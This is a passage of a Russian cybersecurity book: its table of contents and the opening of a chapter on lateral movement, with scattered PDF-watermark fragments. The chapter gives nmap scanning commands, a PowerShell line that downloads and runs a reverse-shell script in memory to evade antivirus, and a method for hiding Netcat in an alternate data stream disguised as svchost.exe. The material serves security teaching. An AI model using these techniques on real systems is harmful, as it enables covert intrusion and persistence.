- •Об авторах
- •О рецензентах
- •Предисловие
- •Стратегия безопасности
- •Текущий ландшафт киберугроз
- •Приложения
- •Данные
- •Проблемы кибербезопасности
- •Старые методы и более широкие результаты
- •Изменение ландшафта угроз
- •Улучшение стратегии безопасности
- •Красная и Синяя команды
- •Подразумеваем взлом
- •Справочные материалы
- •Резюме
- •Процесс реагирования на компьютерные инциденты
- •Процесс реагирования на компьютерные инциденты
- •Создание процесса реагирования на компьютерные инциденты
- •Команда реагирования на компьютерные инциденты
- •Жизненный цикл компьютерного инцидента
- •Обработка инцидента
- •Передовые методы оптимизации обработки компьютерных инцидентов
- •Деятельность после инцидента
- •Реальный сценарий
- •Выводы
- •Реагирование на компьютерные инциденты в облаке
- •Справочные материалы
- •Резюме
- •Жизненный цикл атаки
- •Внешняя разведка
- •Сканирование
- •Доступ и повышение привилегий
- •Вертикальное повышение привилегий
- •Горизонтальное повышение привилегий
- •Проникновение и утечки
- •Тыловое обеспечение
- •Штурм
- •Обфускация
- •Управление жизненным циклом угроз
- •Справочные материалы
- •Резюме
- •Разведка и сбор данных
- •Внешняя разведка
- •Копание в мусоре
- •Социальные сети
- •Социальная инженерия
- •Внутренняя разведка
- •Анализ трафика и сканирование
- •Вардрайвинг
- •Завершая эту главу
- •Справочные материалы
- •Резюме
- •Компрометация системы
- •Анализ современных тенденций
- •Вымогательство
- •Манипулирование данными
- •Атаки на IoT-устройства
- •Бэкдоры
- •Атаки на мобильные устройства
- •Взлом повседневных устройств
- •Взлом облака
- •Фишинг
- •Эксплуатация уязвимостей
- •Уязвимость нулевого дня
- •Фаззинг
- •Анализ исходного кода
- •Типы эксплойтов нулевого дня
- •Перезапись структурированного обработчика исключений
- •Развертывание полезных нагрузок
- •Компрометация операционных систем
- •Компрометация удаленной системы
- •Компрометация веб-приложений
- •Справочные материалы
- •Резюме
- •Охота на пользовательские реквизиты
- •Стратегии компрометации реквизитов доступа пользователя
- •Получение доступа к сети
- •Сбор учетных данных
- •Взлом реквизитов доступа пользователя
- •Полный перебор
- •Социальная инженерия
- •Атака Pass-the-hash
- •Другие способы взлома реквизитов доступа
- •Справочные материалы
- •Резюме
- •Дальнейшее распространение по сети
- •Инфильтрация
- •Построение карты сети
- •Избежать оповещений
- •Дальнейшее распространение
- •Сканирование портов
- •Sysinternals
- •Общие файловые ресурсы
- •Удаленный доступ к рабочему столу
- •PowerShell
- •Инструментарий управления Windows
- •Запланированные задачи
- •Кража авторизационных токенов
- •Атака Pass-the-hash
- •Active Directory
- •Удаленный доступ к реестру
- •Анализ взломанных хостов
- •Консоли центрального администратора
- •Кража сообщений электронной почты
- •Справочные материалы
- •Резюме
- •Повышение привилегий
- •Инфильтрация
- •Горизонтальное повышение привилегий
- •Вертикальное повышение привилегий
- •Как избежать оповещений
- •Выполнение повышения привилегий
- •Эксплуатация неисправленных операционных систем
- •Манипулирование маркерами доступа
- •Эксплуатация специальных возможностей
- •Application Shimming
- •Обход контроля над учетной записью пользователя
- •Внедрение DLL-библиотек
- •Перехват порядка поиска DLL
- •Перехват поиска dylib
- •Исследование уязвимостей
- •Запускаемые демоны
- •Практический пример повышения привилегий в Windows 8
- •Выводы
- •Справочные материалы
- •Резюме
- •Политика безопасности
- •Проверка политики безопасности
- •Обучение конечного пользователя
- •Рекомендации по безопасности для пользователей социальных сетей
- •Тренинг по безопасности
- •Использование политики
- •Белый список приложений
- •Усиление защиты
- •Мониторинг на предмет соответствия
- •Справочные материалы
- •Резюме
- •Сегментация сети
- •Глубоко эшелонированная защита
- •Инфраструктура и службы
- •Документы в процессе передачи
- •Конечные точки
- •Сегментация физической сети
- •Открывая схему сети
- •Обеспечение удаленного доступа к сети
- •VPN типа «сеть–сеть»
- •Сегментация виртуальной сети
- •Безопасность гибридной облачной сети
- •Справочные материалы
- •Резюме
- •Активные сенсоры
- •Возможности обнаружения
- •Индикаторы компрометации
- •Системы обнаружения вторжений
- •Система предотвращения вторжений
- •Обнаружение на основе правил
- •Обнаружение на основе аномалий
- •Поведенческая аналитика внутри организации
- •Размещение устройств
- •Поведенческая аналитика в гибридном облаке
- •Центр безопасности Azure
- •Справочные материалы
- •Резюме
- •Киберразведка
- •Введение в киберразведку
- •Инструментальные средства киберразведки с открытым исходным кодом
- •Средства киберразведки компании Microsoft
- •Центр безопасности Azure
- •Использование киберразведки для расследования подозрительной деятельности
- •Справочные материалы
- •Резюме
- •Расследование инцидента
- •Масштаб проблемы
- •Ключевые артефакты
- •Исследование скомпрометированной системы внутри организации
- •Исследование скомпрометированной системы в гибридном облаке
- •Ищите и обрящете
- •Выводы
- •Справочные материалы
- •Резюме
- •Процесс восстановления
- •План послеаварийного восстановления
- •Процесс планирования послеаварийного восстановления
- •Вызовы
- •Восстановление без перерыва в обслуживании
- •Планирование на случай непредвиденных обстоятельств
- •Процесс планирования на случай непредвиденных обстоятельств в сфере IT
- •Передовые методы восстановления
- •Справочные материалы
- •Резюме
- •Управление уязвимостями
- •Создание стратегии управления уязвимостями
- •Инвентаризация ресурсов
- •Управление информацией
- •Оценка рисков
- •Оценка уязвимостей
- •Отчеты и отслеживание исправлений
- •Планирование реагирования
- •Инструменты управления уязвимостями
- •Реализация управления уязвимостями
- •Передовые методы управления уязвимостями
- •Реализация управления уязвимостями с помощью Nessus
- •Flexera (Secunia) Personal Software Inspecto
- •Заключение
- •Справочные материалы
- •Резюме
- •Анализ журналов
- •Сопоставление данных
- •Журналы операционной системы
- •Журналы Windows
- •Журналы Linux
- •Журналы брандмауэра
- •Журналы веб-сервера
- •Справочные материалы
- •Резюме
- •Предметный указатель
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
||
|
|
X |
|
|
|
|
|
||
|
- |
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
|
|||
|
|
|
|
|
BUY |
|
|
||
|
|
|
|
to |
|
|
|
|
|
w Click |
|
|
|
|
m |
||||
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
|
e |
|
|
|
|
|
|
|
n |
|
|
||
|
|
|
|
|
|
Глава |
|||
|
|
|
|
-xcha |
|
|
|
7
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Дальнейшее распространение по сети
В предыдущих главах мы обсудили средства и методы, которые злоумышлен- ники используют для компрометации и получения доступа к системе. В этой главе основное внимание будет уделено тому, что они пытаются сделать пос ле успешного входа, укрепляя и расширяя свое присутствие. Это называется дальнейшим распространением по сети. Злоумышленники будут переме- щаться с устройства на устройство после первоначального взлома с надеждой получить доступ к ценным данным. Они также будут искать пути получения дополнительного контроля над сетью жертвы и в то же время будут старать- ся избежать сигнала тревоги или срабатывания какого-либо предупреждения. Эта фаза жизненного цикла атаки можетзанятьмного времени.В случае очень сложных атак у хакеров уходит несколько месяцев, чтобы добраться до жела- емой цели.
Дальнейшее распространение по сети включает в себя сканирование сети на предмет других ресурсов, сбор и эксплуатацию учетных данных или сбор дополнительной информации для просачивания. Дальнейшее распростране- ние трудно остановить, потому что организации обычно устанавливают меры по обеспечению безопасности на нескольких шлюзах сети. Следовательно, злонамеренное поведение обнаруживается только при переходе между зона- ми безопасности, но не внутри них. Это важный этап в жизненном цикле ки- беругроз, поскольку он позволяет злоумышленникам получать информацию и повышать уровень доступа, что более опасно. По словам экспертов по ки- бербезопасности, это самая критическая фаза атаки, поскольку именно здесь злоумышленник ищетресурсы,дополнительные привилегии и перебираетне- сколькосистем,дотехпорапоканеудовлетворитсятем,чтодостигсвоейцели.
В этой главе будут рассмотрены следующие темы:инфильтрация;построение карты сети;
как избежать оповещений;дальнейшее распространение.
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
142 Дальнейшее распространение по сети |
|||||
w Click |
|
|||||||||
|
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
||
|
|
|
|
|
|
Инфильтрация |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
В предыдущей главе мы обсуждали усилия, предпринимаемые хакерами при проведенииразведки,чтобыполучитьинформацию,котораяможетпозволить им проникнуть в систему. Методы внешней разведки – это копание в мусоре, использование социальных сетей и социальная инженерия.При копании в му- сореможнособратьценныеданныесустройств,утилизированныхкомпанией. Мы убедились, что социальные сети можно использовать для слежки за жерт- вами и получения учетных данных, которые они могут по невнимательности оставлять. Мы также обсудили различные атаки с использованием социаль- ной инженерии,которые ясно показали,что злоумышленник может вынудить пользователя выдать учетные данные для входа. Причины, по которым поль- зователиклюютнатакиеспособы,былиобъяснены спомощьюшестирычагов, используемых в социальной инженерии.
Обсуждались методы внутренней разведки, а также инструменты, исполь- зуемые для прослушивания и сканирования информации, которая может по- зволить злоумышленнику получить доступ к системе. Используя эти два типа разведки,злоумышленник сможетполучитьдоступ к системе.Важный вопрос, который должен последовать вслед этим: что может сделать злоумышленник с этим доступом?
Построение карты сети
После успешной атаки злоумышленники попытаются обнаружить в сети хос ты, содержащие ценную информацию. Здесь есть ряд инструментов, которые можно использовать для идентификации хостов, подключенных к сети. Один из наиболее часто используемых–это nmap,и в этом разделе мы объясним воз- можности отображения,которыми он обладает.Эта утилита,как и многиедру- гие,перечислитвсехосты,которыеонанайдетвсетивпроцессеихпоиска.Она запускается с помощью команды сканирования всей подсети:
#nmap 10.168.3.1/24
Сканирование также может быть выполнено для определенного диапазона IP-адресов следующим образом:
#nmap 10.250.3.1-200
Ниже приведена команда,которая может использоваться для сканирования определенных портов:
#nmap -p80,23,21 192.190.3.25
Получив эту информацию, злоумышленник может определить операцион- ную систему, работающую на интересующих его компьютерах в сети. Если ха- кер может указать операционную систему и конкретную версию, запущенную на целевом устройстве,будетлегко выбратьинструментыдля взлома,которые можно эффективно использовать.
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
|||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
|
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
Инфильтрация 143to |
BUY |
|
|
||||||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
w Click |
|
|
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
|
m |
||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
|||||||
|
|
p |
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
Нижеприведенакоманда,используемаядляопределенияоперационнойси- |
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
стемы и версии, запущенной на целевом устройстве:
#nmap -O 191.160.254.35
nmap обладает сложными возможностями определения ОС по характерным признакам и почти всегда сможет рассказать нам об операционных системах устройств,таких как маршрутизаторы, рабочие станции и серверы.
Причина, по которой построение карты сети возможно и в значительной степени легко осуществимо, заключается в проблемах, связанных с защитой от сканирования. У организаций есть возможность полностью защитить свои системы,чтобыпредотвратитьподобныесканирования,выполняемыеnmap,но в основном этоделается с помощью сетевой системы обнаружения вторже-
ний (NDIS). Когда хакеры сканируют отдельные цели, они делают это из ло- кального сегмента сети и таким образом избегают прохождения через NDIS. Чтобы предотвратить сканирование,организация может выбрать системы об- наружения вторжений на базе хостов,но большинство сетевых администрато- ров не рассматривает возможности делать это в сети, особенно в том случае, если количество хостов очень велико.
Расширение систем мониторинга на каждом хосте приведет к увеличению количества предупреждений и потребует большей емкости хранилища. В за- висимости от размера организации это может вылиться в терабайт данных, большинство из которых будут ложными срабатываниями. Помимо этого, существует проблема, заключающаяся в том, что группы по обеспечению ин- формационной безопасности в организациях располагают достаточными ре- сурсами и силой воли для расследования в среднем 4 % всех предупреждений, касающихся кибербезопасности, генерируемых системами безопасности. По- стоянное обнаружениеложных срабатываний в больших количествахтакже не позволяет этим группам отслеживать угрозы, обнаруженные в сетях.
Принимая во внимание проблемы мониторинга деятельности, связанной с боковым смещением, лучшее, на что могут надеяться компании-жертвы, – это решения для обеспечения безопасности на базе хостов.Тем не менее хаке- ры обычно приходят с оружием, чтобы отключить или ослепить их.
Избежать оповещений
На этом этапе злоумышленнику следуетизбегатьподнятиятревоги.Если сете- вые администраторы обнаружат, что в сети существует угроза, они тщательно зачистят ее и аннулируют любое продвижение, достигнутое злоумышленни- ком. Многие организации тратят значительные суммы на системы безопас- ности,чтобысхватитьзлоумышленников.Средстваобеспечениябезопасности становятся все более эффективными и могут идентифицировать множество сигнатур хакерских утилит и вредоносных программ, которые те используют. Следовательно, это требует от злоумышленников разумных действий. Среди хакеров существует тенденция использовать легитимные средства для даль- нейшего распространения по сети. Это утилиты и методы, которые известны
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
144 Дальнейшее распространение по сети |
|
|
|
|
to |
|
|
|
|
|
|
|||||||
w Click |
|
w Click |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
m |
|
|
|
|
|
|
|
m |
||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
|
|
системе или являются ее частью и, следовательно, обычно не представляют |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
угрозы. Поэтому системы безопасности игнорируют их.
Эти инструменты и методы позволили злоумышленникам перемещаться в защищенных сетях прямо под носом у систем безопасности.
Ниже приведен пример того, как злоумышленники могут не дать обнару- жить себя с помощью PowerShell. Вы увидите, что вместо загрузки файла, ко- торый будет сканироваться антивирусной системой жертвы, используется Po werShell.Он напрямую загружает в память файл PS1 из интернета,вместотого чтобы скачать его на диск, а затем загрузить:
PS > IEX (New-Object Net.WebClient).DownloadString(‘http:///Invoke-PowerShellTcp.ps1’)
Такая команда предотвратит пометку загружаемого файла антивирусными программами. Злоумышленники также могут использовать альтернативные потоки данных (ADS) в файловой системе Windows NT (NTFS), чтобы избе- жатьоповещений.ИспользуяADS,злоумышленникимогутскрыватьсвоифай- лы в допустимых системных файлах,что может быть отличной стратегией для перемещениямеждусистемами.СледующаякомандаскопируетNetcat (https:// github.com/diegocr/netcat) в допустимую утилиту Windows под названием Calculator (calc.exe) и изменит имя файла (nc.exe) на svchost.exe. Таким образом, имя процесса не вызовет никаких подозрений, поскольку это часть системы.
Рис.7.1
Если вы просто используете команду dir для вывода списка всех файлов в этой папке,то не увидите файл.
Однако если вы используете утилиту streams с сайта Sysinternals,то сможете увидеть все имя полностью.
Дальнейшее распространение
Дальнейшее распространение может осуществляться с использованием раз- ных методов и тактик. Злоумышленники используют их для перемещения по сети с одного устройства на другое. Их цели – усиление своего присутствия в сети и получение доступа ко множеству устройств, которые либо содержат ценную информацию, либо используются для управления такими важными функциями, как безопасность. В этом разделе мы рассмотрим самые распро- страненные инструменты и тактики.
Сканирование портов
Это, вероятно, единственный старый метод, который остался в арсенале ха- керов. Он практически не изменился, поэтому выполняется одинаково с по-